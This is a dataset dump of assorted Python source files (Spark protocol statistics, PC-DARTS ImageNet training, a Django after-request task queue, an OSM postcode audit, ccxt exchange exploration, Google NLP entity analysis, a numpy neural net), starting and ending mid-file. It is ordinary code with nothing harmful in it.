output_json:\n # Print results to standard output\n cprint(output_json)\n\n # Send results to the specified host\n send_data(output_json, output_host)\n\n\ndef get_protocol_name(protocol_identifier):\n \"\"\"\n Returns protocol name for the given identifier.\n\n :param protocol_identifier: Number representing the protocol.\n :return: string \"tcp\" if protocol_identifier is 6, \"udp\" if protocol_identifier is 17, and \"other\" otherwise\n \"\"\"\n\n # Check identifier and return corresponfing string\n if protocol_identifier == 6:\n return \"tcp\"\n elif protocol_identifier == 17:\n return \"udp\"\n else:\n return \"other\"\n\n\ndef count_protocols_statistics(flows_stream, window_duration, window_slide):\n \"\"\"\n Count number of transferred flows, packets, and bytes of TCP, UDP, and other protocols using Spark Streaming functions.\n\n :param flows_stream: DStream of parsed flows in the JSON format\n :param window_duration: Duration of the time window for statistics count\n :param window_slide: Slide interval of the time window for statistics count (typically same as window_duration)\n :return: union DStream of UDP, TCP, and other protocols statistics\n \"\"\"\n\n # Check required flow keys\n flows_stream_checked = flows_stream.filter(lambda flow_json: (\"ipfix.protocolIdentifier\" in flow_json.keys()))\n\n # Set protocol name as a key and map number of flows, packets, and bytes\n flows_mapped = flows_stream_checked.map(lambda flow_json: (get_protocol_name(flow_json[\"ipfix.protocolIdentifier\"]), (1, flow_json[\"ipfix.packetDeltaCount\"], flow_json[\"ipfix.octetDeltaCount\"])))\n\n # Reduce mapped flows to get statistics for smallest analysis interval and reduce volume of processed data\n flows_reduced = flows_mapped.reduceByKey(lambda actual, update: (\n actual[0] + update[0],\n actual[1] + update[1],\n actual[2] + update[2]\n ))\n\n # Set time window and compute statistics over the window using the same reduce\n flows_statistics = flows_reduced.window(window_duration, window_slide)\\\n .reduceByKey(lambda actual, update: (\n actual[0] + update[0],\n actual[1] + update[1],\n actual[2] + update[2]\n ))\n\n # Return computed statistics\n return flows_statistics\n\n\nif __name__ == \"__main__\":\n # Define application arguments (automatically creates -h argument)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-iz\", \"--input_zookeeper\", help=\"input zookeeper hostname:port\", type=str, required=True)\n parser.add_argument(\"-it\", \"--input_topic\", help=\"input kafka topic\", type=str, required=True)\n parser.add_argument(\"-oh\", \"--output_host\", help=\"output hostname:port\", type=str, required=True)\n\n # Parse obtained arguments\n args = parser.parse_args()\n\n # Set variables\n application_name = os.path.basename(sys.argv[0]) # Application name used as identifier\n kafka_partitions = 1 # Number of partitions of the input Kafka topic\n window_duration = 10 # Analysis window duration (10 seconds)\n window_slide = 10 # Slide interval of the analysis window (10 seconds)\n\n # Spark context initialization\n sc = SparkContext(appName=application_name + \" \" + \" \".join(sys.argv[1:])) # Application name used as the appName\n ssc = StreamingContext(sc, 1) # Spark microbatch is 1 second\n\n # Initialize input DStream of flows from specified Zookeeper server and Kafka topic\n input_stream = KafkaUtils.createStream(ssc, args.input_zookeeper, \"spark-consumer-\" + application_name, {args.input_topic: kafka_partitions})\n\n # Parse flows in the JSON format\n flows_json = input_stream.map(lambda x: json.loads(x[1]))\n\n # Count statistics of the UDP, TCP, and other protocols\n statistics = count_protocols_statistics(flows_json, window_duration, window_slide)\n\n # Process computed statistics and send them to the specified host\n statistics.foreachRDD(lambda rdd: process_results(rdd.collectAsMap(), args.output_host))\n\n # Start Spark streaming context\n ssc.start()\n ssc.awaitTermination()\n","sub_path":"applications/statistics/protocols_statistics/spark/protocols_statistics.py","file_name":"protocols_statistics.py","file_ext":"py","file_size_in_byte":8140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"272389720","text":"import os\nimport sys\nimport numpy as np\nimport time\nimport torch\nimport utils\nimport glob\nimport random\nimport logging\nimport argparse\nimport torch.nn as nn\nimport genotypes\nimport torch.utils\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torch.backends.cudnn as cudnn\n\nfrom torch.autograd import Variable\nfrom model import NetworkImageNet as Network\n\n# basic\nimport socket\nimport warnings\nimport copy\n\n# torch\nimport torch.nn.parallel\nimport torch.distributed as dist\nimport torch.optim\nimport torch.multiprocessing as mp\nimport torch.utils.data as data\nfrom tensorboardX import SummaryWriter\n\ndef find_free_port():\n import socket\n s = socket.socket()\n s.bind(('', 0)) # Bind to a free port provided by the host.\n return s.getsockname()[1] # Return the port number assigned.\n\nparser = argparse.ArgumentParser(\"training imagenet\")\nparser.add_argument('--workers', type=int, default=32, help='number of workers to load dataset')\nparser.add_argument('--batch_size', type=int, default=1024, help='batch size')\nparser.add_argument('--learning_rate', type=float, default=0.5, help='init learning rate')\nparser.add_argument('--momentum', type=float, default=0.9, help='momentum')\nparser.add_argument('--weight_decay', type=float, default=3e-5, help='weight decay')\nparser.add_argument('--report_freq', type=float, default=100, help='report frequency')\nparser.add_argument('--epochs', type=int, default=250, help='num of training epochs')\nparser.add_argument('--init_channels', type=int, default=48, help='num of init channels')\nparser.add_argument('--layers', type=int, default=14, help='total number of layers')\nparser.add_argument('--auxiliary', action='store_true', default=True, help='use auxiliary tower')\nparser.add_argument('--auxiliary_weight', type=float, default=0.4, help='weight for auxiliary loss')\nparser.add_argument('--drop_path_prob', type=float, default=0, help='drop path probability')\nparser.add_argument('--save', type=str, default='augments', help='experiment name')\nparser.add_argument('--seed', type=int, default=0, help='random seed')\nparser.add_argument('--arch', type=str, default='PCDARTS', help='which architecture to use')\nparser.add_argument('--grad_clip', type=float, default=5., help='gradient clipping')\nparser.add_argument('--label_smooth', type=float, default=0.1, help='label smoothing')\nparser.add_argument('--lr_scheduler', type=str, default='linear', help='lr scheduler, linear or cosine')\nparser.add_argument('--tmp_data_dir', type=str, default='augments', help='temp data dir')\nparser.add_argument('--note', type=str, default='try', help='note for this run')\nparser.add_argument('--world_size', type=int, default=-1)\nparser.add_argument('--resume', default='', type=str, metavar='PATH', help='path to latest checkpoint (default: none)')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)')\n\nargs, unparsed = parser.parse_known_args()\njobid = os.environ[\"SLURM_JOBID\"]\nargs.save = '{}/{}'.format(args.save, jobid)\nutils.create_exp_dir(args.save, scripts_to_save=glob.glob('*.py'))\nlog_format = '%(asctime)s %(message)s'\n\nCLASSES = 1000\n\nclass CrossEntropyLabelSmooth(nn.Module):\n\n def __init__(self, num_classes, epsilon):\n super(CrossEntropyLabelSmooth, self).__init__()\n self.num_classes = num_classes\n self.epsilon = epsilon\n self.logsoftmax = nn.LogSoftmax(dim=1)\n\n def forward(self, inputs, targets):\n log_probs = self.logsoftmax(inputs)\n targets = torch.zeros_like(log_probs).scatter_(1, targets.unsqueeze(1), 1)\n targets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes\n loss = (-targets * log_probs).mean(0).sum()\n return loss\n\n\ndef main():\n # For slurm available\n if \"SLURM_NPROCS\" in os.environ:\n # acquire world size from slurm\n args.world_size = int(os.environ[\"SLURM_NPROCS\"])\n args.rank = int(os.environ[\"SLURM_PROCID\"])\n jobid = os.environ[\"SLURM_JOBID\"]\n hostfile = os.path.join(args.save, \"dist_url.\" + jobid + \".txt\")\n if args.rank == 0:\n ip = socket.gethostbyname(socket.gethostname())\n port = find_free_port()\n args.dist_url = \"tcp://{}:{}\".format(ip, port)\n with open(hostfile, \"w\") as f:\n f.write(args.dist_url)\n else:\n while not os.path.exists(hostfile):\n time.sleep(5) # waite for the main process\n with open(hostfile, \"r\") as f:\n args.dist_url = f.read()\n print(\"dist-url:{} at PROCID {} / {}\".format(args.dist_url, args.rank, args.world_size))\n\n # support multiple GPU on one node\n # assume each node have equal GPUs\n ngpus_per_node = torch.cuda.device_count()\n args.world_size = ngpus_per_node * args.world_size\n mp.spawn(worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))\n\n\ndef worker(gpu, ngpus_per_node, config_in):\n # init\n args = copy.deepcopy(config_in)\n jobid = os.environ[\"SLURM_JOBID\"]\n procid = int(os.environ[\"SLURM_PROCID\"])\n args.gpu = gpu\n\n if args.gpu is not None:\n writer_name = \"tb.{}-{:d}-{:d}\".format(jobid, procid, gpu)\n logger_name = \".{}-{:d}-{:d}.aug.log\".format(jobid, procid, gpu)\n ploter_name = \"{}-{:d}-{:d}\".format(jobid, procid, gpu)\n ck_name = \"{}-{:d}-{:d}\".format(jobid, procid, gpu)\n else:\n writer_name = \"tb.{}-{:d}-all\".format(jobid, procid)\n logger_name = \"{}-{:d}-all.aug.log\".format(jobid, procid)\n ploter_name = \"{}-{:d}-all\".format(jobid, procid)\n ck_name = \"{}-{:d}-all\".format(jobid, procid)\n\n writer = SummaryWriter(log_dir=os.path.join(args.save, writer_name))\n logger = utils.get_logger(os.path.join(args.save, logger_name))\n\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n\n args.rank = args.rank * ngpus_per_node + gpu\n dist.init_process_group(backend=\"nccl\", init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n\n np.random.seed(args.seed)\n cudnn.benchmark = True\n torch.manual_seed(args.seed)\n cudnn.enabled = True\n torch.cuda.manual_seed(args.seed)\n logger.info(\"args = %s\", args)\n logger.info(\"unparsed_args = %s\", unparsed)\n num_gpus = torch.cuda.device_count()\n genotype = eval(\"genotypes.%s\" % args.arch)\n print('---------Genotype---------')\n logger.info(genotype)\n print('--------------------------')\n model = Network(args.init_channels, CLASSES, args.layers, args.auxiliary, genotype)\n if args.gpu is not None:\n torch.cuda.set_device(args.gpu)\n # model = model.to(device)\n model.cuda(args.gpu)\n # When using a single GPU per process and per DistributedDataParallel, we need to divide\n # the batch size ourselves based on the total number of GPUs we have\n args.batch_size = int(args.batch_size / ngpus_per_node)\n args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)\n # model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[config.rank])\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])\n # model = torch.nn.parallel.DistributedDataParallel(model, device_ids=None, output_device=None)\n else:\n model.cuda()\n # DistributedDataParallel will divide and allocate batch_size to all\n # available GPUs if device_ids are not set\n model = torch.nn.parallel.DistributedDataParallel(model)\n\n logger.info(\"param size = %fMB\", utils.count_parameters_in_MB(model))\n criterion = nn.CrossEntropyLoss()\n criterion = criterion.cuda()\n criterion_smooth = CrossEntropyLabelSmooth(CLASSES, args.label_smooth)\n criterion_smooth = criterion_smooth.cuda()\n\n optimizer = torch.optim.SGD(\n model.parameters(),\n args.learning_rate,\n momentum=args.momentum,\n weight_decay=args.weight_decay\n )\n best_acc_top1 = 0\n best_acc_top5 = 0\n\n if args.resume:\n if os.path.isfile(args.resume):\n logger.info(\"=> loading checkpoint '{}'\".format(args.resume))\n if args.gpu is None:\n checkpoint = torch.load(args.resume)\n else:\n # Map model to be loaded to specified single gpu.\n loc = 'cuda:{}'.format(args.gpu)\n checkpoint = torch.load(args.resume, map_location=loc)\n args.start_epoch = checkpoint['epoch']\n best_acc_top1 = checkpoint['best_acc_top1']\n model.module.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n else:\n logger.info(\"=> no checkpoint found at '{}'\".format(args.resume))\n data_dir = os.path.join(args.tmp_data_dir, 'imagenet')\n traindir = os.path.join(data_dir, 'train')\n validdir = os.path.join(data_dir, 'valid')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n train_data = dset.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ColorJitter(\n brightness=0.4,\n contrast=0.4,\n saturation=0.4,\n hue=0.2),\n transforms.ToTensor(),\n normalize,\n ]))\n valid_data = dset.ImageFolder(\n validdir,\n transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ]))\n\n train_sampler = data.distributed.DistributedSampler(train_data,\n num_replicas=args.world_size,\n rank=args.rank)\n valid_sampler = data.distributed.DistributedSampler(valid_data,\n num_replicas=args.world_size,\n rank=args.rank)\n train_queue = torch.utils.data.DataLoader(\n train_data, batch_size=args.batch_size, sampler=train_sampler, pin_memory=True, num_workers=args.workers)\n\n valid_queue = torch.utils.data.DataLoader(\n valid_data, batch_size=args.batch_size, sampler=valid_sampler, pin_memory=True, num_workers=args.workers)\n\n # scheduler = torch.optim.lr_scheduler.StepLR(optimizer, args.decay_period, gamma=args.gamma)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, float(args.epochs))\n\n lr = args.learning_rate\n for epoch in range(args.start_epoch, args.epochs):\n valid_sampler.set_epoch(epoch)\n train_sampler.set_epoch(epoch)\n if args.lr_scheduler == 'cosine':\n scheduler.step()\n current_lr = scheduler.get_lr()[0]\n elif args.lr_scheduler == 'linear':\n current_lr = adjust_lr(optimizer, epoch)\n else:\n print('Wrong lr type, exit')\n sys.exit(1)\n logger.info('Epoch: %d lr %e', epoch, current_lr)\n if epoch < 5 and args.batch_size > 256:\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * (epoch + 1) / 5.0\n logger.info('Warming-up Epoch: %d, LR: %e', epoch, lr * (epoch + 1) / 5.0)\n if num_gpus > 1:\n model.module.drop_path_prob = args.drop_path_prob * epoch / args.epochs\n else:\n model.drop_path_prob = args.drop_path_prob * epoch / args.epochs\n epoch_start = time.time()\n train_acc, train_obj = train(train_queue, model, criterion_smooth, optimizer, epoch, writer, logger)\n logger.info('Train_acc: %f', train_acc)\n\n valid_acc_top1, valid_acc_top5, valid_obj = infer(valid_queue, model, criterion, logger)\n logger.info('Valid_acc_top1: %f', valid_acc_top1)\n logger.info('Valid_acc_top5: %f', valid_acc_top5)\n epoch_duration = time.time() - epoch_start\n logger.info('Epoch time: %ds.', epoch_duration)\n is_best = False\n if valid_acc_top5 > best_acc_top5:\n best_acc_top5 = valid_acc_top5\n if valid_acc_top1 > best_acc_top1:\n best_acc_top1 = valid_acc_top1\n is_best = True\n if args.rank == 0:\n utils.save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': model.module.state_dict(),\n 'best_acc_top1': best_acc_top1,\n 'optimizer': optimizer.state_dict(),\n }, is_best, args.save)\n # get data with meta info\n\n \ndef adjust_lr(optimizer, epoch):\n # Smaller slope for the last 5 epochs because lr * 1/250 is relatively large\n if args.epochs - epoch > 5:\n lr = args.learning_rate * (args.epochs - 5 - epoch) / (args.epochs - 5)\n else:\n lr = args.learning_rate * (args.epochs - epoch) / ((args.epochs - 5) * 5)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr \n\n\ndef train(train_queue, model, criterion, optimizer, epoch, writer, logger):\n global start_time\n objs = utils.AvgrageMeter()\n top1 = utils.AvgrageMeter()\n top5 = utils.AvgrageMeter()\n batch_time = utils.AvgrageMeter()\n model.train()\n cur_step = epoch * len(train_queue)\n\n for step, (input, target) in enumerate(train_queue):\n target = target.cuda(non_blocking=True)\n input = input.cuda(non_blocking=True)\n b_start = time.time()\n optimizer.zero_grad()\n logits, logits_aux = model(input)\n loss = criterion(logits, target)\n if args.auxiliary:\n loss_aux = criterion(logits_aux, target)\n loss += args.auxiliary_weight*loss_aux\n\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)\n optimizer.step()\n batch_time.update(time.time() - b_start)\n prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))\n n = input.size(0)\n objs.update(loss.data.item(), n)\n top1.update(prec1.data.item(), n)\n top5.update(prec5.data.item(), n)\n writer.add_scalar('train/loss', loss.item(), cur_step)\n writer.add_scalar('train/top1', prec1.item(), cur_step)\n writer.add_scalar('train/top5', prec5.item(), cur_step)\n\n if step % args.report_freq == 0:\n end_time = time.time()\n if step == 0:\n duration = 0\n start_time = time.time()\n else:\n duration = end_time - start_time\n start_time = time.time()\n logger.info('TRAIN Step: %03d Objs: %e R1: %f R5: %f Duration: %ds BTime: %.3fs',\n step, objs.avg, top1.avg, top5.avg, duration, batch_time.avg)\n\n return top1.avg, objs.avg\n\n\ndef infer(valid_queue, model, criterion, logger):\n objs = utils.AvgrageMeter()\n top1 = utils.AvgrageMeter()\n top5 = utils.AvgrageMeter()\n model.eval()\n\n for step, (input, target) in enumerate(valid_queue):\n input = input.cuda()\n target = target.cuda(non_blocking=True)\n with torch.no_grad():\n logits, _ = model(input)\n loss = criterion(logits, target)\n\n prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))\n n = input.size(0)\n objs.update(loss.data.item(), n)\n top1.update(prec1.data.item(), n)\n top5.update(prec5.data.item(), n)\n\n if step % args.report_freq == 0:\n end_time = time.time()\n if step == 0:\n duration = 0\n start_time = time.time()\n else:\n duration = end_time - start_time\n start_time = time.time()\n logger.info('VALID Step: %03d Objs: %e R1: %f R5: %f Duration: %ds', step, objs.avg, top1.avg, top5.avg, duration)\n\n return top1.avg, top5.avg, objs.avg\n\n\nif __name__ == '__main__':\n main() \n","sub_path":"train_imagenet.py","file_name":"train_imagenet.py","file_ext":"py","file_size_in_byte":16173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"111570895","text":"import numpy as np\nimport GensimEmbedding as emb\nfrom NewPlot import Plot \nclass GensimEmbeddingTester(object):\n\t\"\"\"docstring for GensimEmbeddingTester\"\"\"\n\t\n\tdef __init__(self):\n\t\tsuper(GensimEmbeddingTester, self).__init__()\n\t\n\tdef words_from_5concepts_dendrogram(self):\n\t\tfrom ConceptManager import ConceptManager as CM\n\n\t\twords = list()\n\n\t\tcm_size = 5\n\t\tcm = CM(cm_size)\n\t\tfor i in range(cm_size):\n\t\t\tfor word in cm.conceptList[i].fullConcept():\n\t\t\t\tif word not in words:\n\t\t\t\t\tif word in emb.model.wv.index2word:\n\t\t\t\t\t\twords.append(word)\n\n\t\tdist_matrix = np.ndarray(shape=(len(words),len(words)))\n\t\tfor i in range(len(words)):\n\t\t\tfor j in range(len(words)):\n\t\t\t\tdist_matrix[i][j] = emb.model.similarity(words[i],words[j])\n\n\t\tPlot().dendrogram(dist_matrix,words)\n\n\t\t\n\n\ndef main():\n\tGensimEmbeddingTester().words_from_5concepts_dendrogram()\n\nif __name__ == '__main__':\n\tmain()\n\t\t","sub_path":"Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578763926","text":"import datetime\nimport sys\nimport threading\n\nimport rollbar\nfrom django.conf import settings\nfrom django.core.signals import request_finished\n\n\nthreadlocal = threading.local()\n\ndef process(queue):\n if settings.DEBUG or settings.STAGING:\n now = datetime.datetime.now()\n print('Async tasks: {} to process'.format(len(queue)))\n\n while queue:\n func, args, kwargs = queue.pop()\n try:\n func(*args, **kwargs)\n except Exception as e:\n if settings.DEBUG or settings.STAGING:\n raise e\n rollbar.report_exc_info(sys.exc_info())\n\n if settings.DEBUG or settings.STAGING:\n delta = datetime.datetime.now() - now\n print('Completed in {}'.format(delta))\n\ndef get_queue():\n queue = getattr(threadlocal, 'ppqueue', None)\n if queue is None:\n queue = []\n setattr(threadlocal, 'ppqueue', queue)\n return queue\n\ndef push_task(func, args, kwargs):\n get_queue().append((func, args, kwargs))\n\ndef after_request(sender, **kwargs):\n queue = get_queue()\n if not queue:\n return\n threading.Thread(target=process, args=(queue, )).start()\n setattr(threadlocal, 'ppqueue', [])\n\n\nrequest_finished.connect(after_request)\n\ndef run_after_request(func):\n def wrap(*args, **kwargs):\n push_task(func, args, kwargs)\n return wrap\n","sub_path":"pinecast/post_processing.py","file_name":"post_processing.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385374885","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport xml.etree.cElementTree as ET\nfrom collections import defaultdict\nimport pprint\nimport re\n\n# indicate file to be read\nosmfile = \"sample.osm\"\n\n# create the dict to put zipcodes into\ndef add_to_dict(data_dict, item):\n data_dict[item] += 1\n\n# find the zipcodes\ndef get_postcode(element):\n for tag in element:\n if (tag.attrib['k'] == \"addr:postcode\") or (tag.attrib['k'].find('zip') != -1):\n postcode = tag.attrib['v']\n return postcode\n\n# update zipcodes\ndef update_postal(postcode):\n z_re = re.compile(r'\\d{5}')\n z = postcode\n postcode = z_re.findall(z)[0]\n return postcode\n\n\n# aput the list of zipcodes into dict\ndef audit(osmfile):\n osm_file = open(osmfile, \"r\")\n data_dict = defaultdict(int)\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n if get_postcode(elem.iter(\"tag\")):\n postcode = get_postcode(elem.iter(\"tag\"))\n postcode = update_postal(postcode)\n add_to_dict(data_dict, postcode)\n return data_dict\n\n\n# test the zipcode audit and dict creation\ndef test():\n cleanzips = audit(osmfile)\n pprint.pprint(dict(cleanzips))\n\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"DAND/OpenStreetMap/audit_zip.py","file_name":"audit_zip.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418281615","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 7 00:35:42 2020\r\n\r\n@author: themr\r\n\"\"\"\r\n\r\nimport ccxt\r\n\r\n#print(ccxt.exchanges) \r\n\"\"\"\r\n#questa intanto è una lista di exchange da usare. Potrebbe esserci\r\nun primo loop, su tutti gli exchange, vedere il prezzo del bitoin/eth, per esempio\r\ne capire anche come reagisce se non è disponibile e in caso come gestire\r\ngli errori. Poi tutto questo andrebbe gestito in parallelo su\r\npiù macchine che interrogano contemporaneamente più macchine.\r\n\r\npotrei anche scrivere un tale servizio in c per poi usarlo in python?\r\nsecondo me sì.\r\n\r\n\"\"\"\r\nprint(\"\")\r\n\r\n\r\n\r\ndef getPairs_from_exchange(exchange):\r\n curr_list = []\r\n markets=exchange.load_markets()\r\n for i in markets:\r\n if i.find(\"/\")>=0:\r\n curr_list.append((i.split(\"/\")[0],i.split(\"/\")[1])) \r\n return curr_list\r\n\r\ndef getPairs_from_market(markets):\r\n curr_list = []\r\n for i in markets:\r\n if i.find(\"/\")>=0:\r\n curr_list.append((i.split(\"/\")[0],i.split(\"/\")[1])) \r\n return curr_list\r\n\r\ndef sort_currencies_pairs_by_left(curr_list, curr):\r\n curr_list.sort(key=lambda tup: tup[0]) \r\n return curr_list\r\n\r\ndef sort_currencies_pairs_by_right(curr_list, curr):\r\n curr_list.sort(key=lambda tup: tup[1]) \r\n return curr_list\r\nexchange = ccxt.okcoin () # default id\r\nokcoin1 = ccxt.okcoin({ 'id': 'okcoin1' })\r\nokcoin2 = ccxt.okcoin ({ 'id': 'okcoin2' })\r\n\r\nid = 'btcchina'\r\n#btcchina = eval ('ccxt.%s ()' % id)\r\ncoinbasepro = getattr (ccxt, 'coinbasepro')\r\n# print(type(coinbasepro()))\r\nc_describe=coinbasepro().describe()\r\n\r\n\r\nk = ccxt.kraken()\r\nk_describe =k.describe()\r\n\r\ncurr_list = []\r\nk_markets=k.load_markets()\r\nfor i in k_markets:\r\n if i.find(\"/\")>=0:\r\n curr_list .append((i.split(\"/\")[0],i.split(\"/\")[1]))\r\nprint(curr_list )\r\nl=sort_currencies_pairs_by_right(curr_list, \"USD\")\r\nprint(\"\")\r\nprint(l)\r\nprint(\"\")\r\n#(k.markets['BTC/USD'] )\r\nprint(k.fetch_ticker('BTC/USD')[\"info\"])\r\n# from variable id\r\nexchange_id = 'binance'\r\nexchange_class = getattr(ccxt, exchange_id)\r\nprint(type(exchange_class()))\r\nexchange = exchange_class({\r\n 'apiKey': 'YOUR_API_KEY',\r\n 'secret': 'YOUR_SECRET',\r\n 'timeout': 30000,\r\n 'enableRateLimit': True,\r\n})\r\n","sub_path":"learnccct.py","file_name":"learnccct.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601251886","text":"#!usr/bin/env python\nimport os\n\n\nclass Constants:\n BRICSCAD_APP_NAME = \"BricscadApp.AcadApplication\"\n AUTOCAD_APP_NAME = \"AutoCAD.Application\"\n APP_NAME = BRICSCAD_APP_NAME # switch to other app CAD here.\n\n SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\n PROJ_ROOT = os.path.dirname(SCRIPT_DIR)\n OUTPUT_DIR = os.path.join(PROJ_ROOT, \"output\")\n INPUT_DIR = os.path.join(PROJ_ROOT, \"input\")\n TEST_DIR = os.path.join(PROJ_ROOT, \"test\")\n TESTDATA_DIR = os.path.join(TEST_DIR, \"testdata\")\n\n BAK_FILES = \".bak\"\n DWG_FILES = \".dwg\"\n DXF_FILES = \".dxf\"\n CSV_FILES = \".csv\"\n","sub_path":"python/Architecture/CAD/project_tower/src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563525107","text":"def nlp_analysis(credentials, project, paragraph_text=\"wallstreetjournal\"):\n import pandas as pd\n import numpy as np\n from google.cloud import language_v1\n text = paragraph_text\n client =language_v1.LanguageServiceClient()\n document = {\"content\": text,\n \"type_\":language_v1.Document.Type.PLAIN_TEXT,\"language\": \"en\"}\n \n # Available values: NONE, UTF8, UTF16, UTF32\n encoding_type = language_v1.EncodingType.UTF8\n\n response = client.analyze_entities(request = {'document': document, 'encoding_type': encoding_type})\n \n entity_name=[]\n entity_type=[]\n entity_salience=[]\n\n for entity in response.entities:\n entity_name.append(entity.name)\n entity_type.append(language_v1.Entity.Type(entity.type_).name)\n entity_salience.append(entity.salience)\n \n result = pd.DataFrame({\"entity_name\":entity_name, \"entity_salience\":entity_salience})\n result['entity_salience']=result['entity_salience']*1000\n result['entity_salience']=result['entity_salience'].astype(int)\n result=result.to_dict()\n return result","sub_path":"google_nlp.py","file_name":"google_nlp.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363455956","text":"from random import uniform,seed\nimport numpy as np\nfrom math import exp\nimport matplotlib.pyplot as mpl\n\n#Settings-------\nTRAINING_FILE = 'training_data/mnist_train_0_4.csv'\nTESTING_FILE = 'testing_data/mnist_test_0_4.csv'\n\nALPHA = .5\nEPOCHS = 5\nNUM_INPUTS = 784\nHIDDEN_LAYERS = [50]\nNUM_OUTPUTS = 5\n\nactivation_function = 'sigmoid'\n\n\n\nclass NeuralNet:\n\n\tdef __init__(self, dimensions, alpha = .5, activation_function = 'sigmoid', display_progess = False):\n\n\t\tself.alpha = alpha\n\t\tself.outputs = None\n\t\tself.layers = []\n\t\tself.display_progess = display_progess\n\t\tif activation_function == 'sigmoid':\n\t\t\tself.fn = self.sigmoid\n\t\t\tself.fnp = self.sigmoid_prime\n\t\telif activation_function == 'rectifier':\n\t\t\tself.fn = self.rectifier\n\t\t\tself.fnp = self.rectifier_prime\t\t\n\t\t\t\t\n\t\tfor i in range(1,len(dimensions)):\n\t\t\tself.layers.append(np.array([[uniform(0,1)/(dimensions[i-1]) for _ in range(dimensions[i])] for _ in range(dimensions[i-1])]))\n\n\tdef rectifier(self, x):\n\t\treturn max(0, x)\n\n\tdef rectifier_prime(self, x):\n\t\treturn 1 if x > 0 else 0\n\n\tdef sigmoid(self, x):\n\t\tif x > 50:\n\t\t\treturn .999\n\t\telif x < -50:\n\t\t\treturn .001\n\t\treturn 1/(1+exp(-x))\n\n\tdef sigmoid_prime(self, x):\n\t\treturn (1-x)*x\n\n\tdef predict(self, data):\n\n\t\tself.outputs = [data]\n\t\tfor layer in self.layers: \n\t\t\tself.outputs.append(np.matrix(np.apply_along_axis(self.fn,0, np.dot(self.outputs[-1], layer))))\n\t\t\n\t\tself.outputs.pop(0)\n\t\treturn self.outputs[-1]\n\n\tdef train(self, training_data):\n\t\t#training data is in the format:\n\t\t#\t[( np.matrix([outputs]), np.matrix([datapoints])), ...]\n\t\tk = 1\n\t\tfor answer, data in training_data:\n\n\t\t\tself.predict(data)\n\t\t\t#print(answer, self.outputs[-1].item(0), self.fnp(self.outputs[-1].item(0)), answer-self.outputs[-1])\n\t\t\toutput_delta = np.multiply( np.apply_along_axis(self.fnp, 0, self.outputs[-1]),\n\t\t\t\t(answer-self.outputs[-1]) )\n\n\t\t\tdeltas = [output_delta]\n\n\t\t\t#Find deltas\n\t\t\tfor i in range(len(self.layers)-1,0,-1):\n\t\t\t\tlayer = self.layers[i]\n\t\t\t\trecent_delta = deltas[0]\n\t\t\t\tweight_times_delta = np.dot(layer, np.transpose(recent_delta))\n\n\t\t\t\tdeltas.insert(0, \n\t\t\t\t\tnp.multiply( # multiplies g'(in) by the sum of weight times delta for all weights and deltas\n\t\t\t\t\t\tnp.apply_along_axis( #calculates g'(in) by applying our prime to the outout at each layer\n\t\t\t\t\t\t\tself.fnp, 0, self.outputs[i-1]\n\t\t\t\t\t\t\t\t\t), np.transpose(weight_times_delta)\n\t\t\t\t\t\t))\n\n\t\t\t#Weight update\n\t\t\tfor i in range(len(self.outputs)-2,-1,-1):\n\t\t\t\tchange = np.multiply(np.transpose(self.outputs[i]), deltas[i+1]) * self.alpha #alpha * delta * input\n\t\t\t\tself.layers[i+1] = self.layers[i+1]+change\n\n\t\t\tchange = np.multiply(np.transpose(np.matrix(data)), deltas[0])*self.alpha\n\t\t\tself.layers[0] = self.layers[0] + change\n\n\t\t\tif self.display_progess: print(k)\n\t\t\tk += 